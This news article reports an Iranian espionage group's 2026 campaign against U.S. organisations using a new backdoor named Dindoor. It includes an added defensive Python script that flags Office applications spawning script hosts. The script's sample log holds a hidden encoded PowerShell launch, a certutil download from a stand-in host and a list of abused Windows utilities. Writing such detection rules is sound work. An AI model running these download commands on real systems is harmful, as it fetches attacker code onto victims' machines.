Iran’s MuddyWater Hackers Target US Firms with New Dindoor Backdoor


Cybersecurity researchers at Threat Hunter Team say a long-running Iranian cyber-espionage group has breached several U.S. organizations in a campaign that began earlier this year and has continued even as geopolitical tensions escalate.

The activity has been linked to MuddyWater, an Iran-aligned advanced persistent threat group believed to operate under the country’s Ministry of Intelligence and Security. The hackers are known for cyber-espionage operations that focus on gaining persistent access to networks and collecting sensitive data from government and private sector targets.

The campaign began in early February 2026

Researchers first observed the latest wave of activity in early February, when the attackers began infiltrating networks belonging to several U.S. organizations across different sectors. Investigators say the group managed to establish a foothold in multiple environments, including companies linked to banking and aviation and the Israeli operation of a software development service.

According to a blog post published on 5 March 2026, the campaign appears to focus on stealthy access. In several cases, the attackers maintained hidden persistence inside corporate networks, giving them the ability to gather intelligence and move deeper into systems over time.

Backdoor malware used to maintain access

Once inside a network, the operators deploy a new custom backdoor known as Dindoor, which allows them to communicate with compromised systems and issue commands remotely. The malware is designed to blend in with legitimate traffic, helping the attackers maintain long-term access while avoiding detection.

In many cases, the attackers use stolen credentials, legitimate remote administration tools, or built-in Windows utilities to move across systems after the initial compromise. That approach fits a pattern seen in earlier MuddyWater campaigns, in which the group prioritizes persistence and reconnaissance over immediate disruption.

Phishing and social engineering remain key entry points

While AI-based attacks are on the rise, email-based attacks remain one of the most common ways the group gains entry. In previous operations, MuddyWater distributed malicious documents through spear-phishing emails that encouraged recipients to enable macros or download seemingly legitimate files. Once opened, those documents could install malware or launch additional payloads.

This attack technique has continued to work because it targets employees rather than technical vulnerabilities. By impersonating trusted senders or using realistic themes, attackers can persuade victims to open attachments or click on malicious links.
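The macro-launched payloads and built-in Windows utilities described above leave a recognisable trace in endpoint telemetry: an Office application appearing as the parent of a script host or system utility. The following Python is an added example, not code from the article or from Threat Hunter Team; it runs a simple parent/child process check over constructed Sysmon-style process-creation events (the host names, paths and command lines are invented for the example).

```python
import json

# Office applications that should almost never be the parent of a script host
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script hosts and built-in Windows utilities commonly abused to launch payloads
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def basename(path):
    """Return the lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_office_spawns(events):
    """Return one alert per event where an Office app spawns a suspicious child."""
    alerts = []
    for ev in events:
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
            alerts.append({"host": ev.get("Computer"), "parent": parent,
                           "child": child, "cmd": ev.get("CommandLine", "")})
    return alerts


def parse_log(text):
    """Parse one JSON event per line (Sysmon Event ID 1 style fields)."""
    return [json.loads(line) for line in text.strip().splitlines()]


# Constructed sample events (not real telemetry); <placeholder> stands in for an encoded command
SAMPLE_LOG = r"""
{"Computer": "WS01", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -enc <placeholder>"}
{"Computer": "WS01", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "WINWORD.EXE /n invoice.docm"}
{"Computer": "WS02", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c certutil -urlcache -f http://example.invalid/a.txt a.txt"}
{"Computer": "WS02", "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"}
{"Computer": "WS03", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "WINWORD.EXE /n attachment.docx"}
"""

if __name__ == "__main__":
    for alert in find_office_spawns(parse_log(SAMPLE_LOG)):
        print(f"[{alert['host']}] {alert['parent']} -> {alert['child']}: {alert['cmd']}")
```

Outlook opening Word for an attachment is left unflagged on purpose; it is routine and would drown the rule in noise, whereas Office spawning a shell or script host is rare enough in most estates to warrant triage.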

Attacks continue despite geopolitical escalation

What makes the campaign notable is its timing. The activity has continued even after recent military strikes involving the United States and Israel, a period when security analysts often expect cyber retaliation or intelligence-gathering operations from Iranian-linked groups.

Iran has long treated cyber operations as a strategic tool to gather intelligence and pressure adversaries without direct military confrontation. Previous campaigns have targeted industries such as energy, telecommunications, transportation, and government agencies around the world.

Companies are advised to train employees to recognize and respond to common cyberattack tactics, especially suspicious emails or phone calls where attackers impersonate trusted individuals or organizations. Regular awareness training can help staff verify requests, avoid sharing sensitive information, and report unusual communication before it leads to a compromise.
